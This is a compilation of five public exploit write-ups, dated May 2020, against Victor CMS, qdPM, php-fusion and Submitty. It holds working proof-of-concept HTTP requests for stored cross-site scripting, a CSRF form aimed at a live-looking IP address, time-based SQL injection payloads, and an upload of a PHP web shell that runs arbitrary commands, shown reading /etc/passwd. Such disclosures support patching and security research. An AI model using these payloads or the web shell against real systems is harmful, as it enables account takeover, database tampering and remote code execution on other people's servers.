# Exploit Title: Victor CMS 1.0 - 'comment_author' Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-05-19 # Exploit Author: Kishan Lal Choudhary # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 Description: The POST parameter 'comment_author' is vulnerable to stored cross site scripting Payload: <script>alert(1)</script> POST /post.php?post=1 HTTP/1.1 Host: localhost Content-Length: 146 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/post.php?post=1 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7 Cookie: PHPSESSID=cjpan858fghefnjse7qv1j3v72 Connection: close comment_author=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&comment_email=lol%40lol.com&comment_content=%3Cp%3Etester%3C%2Fp%3E&create_comment= ------------------------------------------------------------------------------------------------------------------------------------------------------------------ CSRF <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://149.28.135.91/post.php?post=1" method="POST"> <input type="hidden" name="comment&#95;author" value="<script>alert&#40;"XSS"&#41;<&#47;script>" /> <input type="hidden" name="comment&#95;email" value="lol&#64;lol&#46;com" /> <input type="hidden" name="comment&#95;content" value="<p>tester<&#47;p>" /> <input type="hidden" name="create&#95;comment" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-05-19 # Exploit Author: Kishan Lal Choudhary # Vendor Homepage: https://qdpm.net # Software Link: https://sourceforge.net/projects/qdpm/ # Version: 9.1 # Tested on: Windows 10 Description: The form parameter 'cfg[app_app_name]' is vulnerable to stored cross site scripting Payload: <script>alert(1)</script> POST /index.php/configuration HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------224716807133186052992861925563 Content-Length: 1881 Origin: http://localhost/ DNT: 1 Connection: close Referer: http://localhost/index.php/configuration?type=general Cookie: qdPM8=c14e5521818ec7a0c8bbc3099a96b94a Upgrade-Insecure-Requests: 1 -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="type" general -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_administrator_email]" [email protected] -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_administrator_password]" -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_app_name]" <script>alert(1)</script> -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_app_short_name]" qdPM -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg_app_app_logo_file"; filename="" Content-Type: application/octet-stream -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_app_logo]" -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[sf_default_timezone]" America/New_York -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[sf_default_culture]" ar -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_rows_per_page]" 25 -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_rows_limit]" 1000 -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_custom_short_date_format]" d M Y -----------------------------224716807133186052992861925563 Content-Disposition: form-data; name="cfg[app_custom_logn_date_format]" d M Y H:i -----------------------------224716807133186052992861925563--

# Exploit Title: Victor CMS 1.0 - Authenticated Arbitrary File Upload # Google Dork: N/A # Date: 2020-05-19 # Exploit Author: Kishan Lal Choudhary # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 Description: The GET parameter '/admin/users.php?source=add_user' is vulnerable Arbitary File Uploads POST /admin/users.php?source=add_user HTTP/1.1 Host: localhost Content-Length: 1049 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrMPNq33u6rCpEFhB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/admin/users.php?source=add_user Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7 Cookie: PHPSESSID=cjpan858fghefnjse7qv1j3v72 Connection: close ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_name" test ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_firstname" test ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_lastname" test ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_image"; filename="exp.php" Content-Type: application/octet-stream <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_role" Admin ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_email" [email protected] ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_password" test@1234 ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="create_user" Add User ------WebKitFormBoundaryrMPNq33u6rCpEFhB-- The Shell can be triggered by visting http://localhost/img/exp.php?cmd=cat%20/etc/passwd

# Exploit Title: php-fusion 9.03.50 - 'ctype' SQL Injection # Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV) # Date: 2020-05-19 # Vendor Homepage: https://www.php-fusion.co.uk/ # Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php # Version: 9.03.50 # Tested On: Windows 10 + XAMPP 7.4.5 ###Describe the bug I've identified an SQL injection vulnerability in the php-fusion 9.03.50 that affects the endpoint /php-fusion/administration/comments.php and can be exploited via the ctype param. ###To Reproduce Steps to reproduce the behavior: 1. Go to login as admin 2. Go to Content Admin -> Comments 3. Filter comments ###POC: Send the following HTTP request (With sleep=3s): GET /php-fusion/administration/comments.php?aid=fee32dbfde52e8ad&ctype=(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(3)))v)%2b'%22%2b(select(0)from(select(sleep(3)))v)%2b%22*/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Result: Server to sleep for 3+3+3=9 seconds ###Impact An attacker can manipulate the SQL statements that are sent to the MySQL database and inject malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database or extract sensitive information ### Reference https://github.com/php-fusion/PHP-Fusion/issues/2327

# Exploit Title: Submitty 20.04.01 - Persistent Cross-Site Scripting # Date: 2020-05-15 # Exploit Author: humblelad # Vendor Homepage: http://submitty.org/ # Software Link: https://github.com/Submitty/Submitty/releases # Version: 20.04.01 # Tested on: Mac Os Catalina # CVE : CVE-2020-12882 Description: Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow.This vulnerability can potentially enable any student to takeover the account of TA if they open the attachment as the cookie gets exposed. 1.As student login, via student:student 2.Go here http://localhost:1501/s20/tutorial/gradeable/01_simple_python (as ex.) 3.In the new submission upload the malicious .svg file with any xss payload. Login as ta and open the same for grading. The XSS gets triggered alerting the cookies.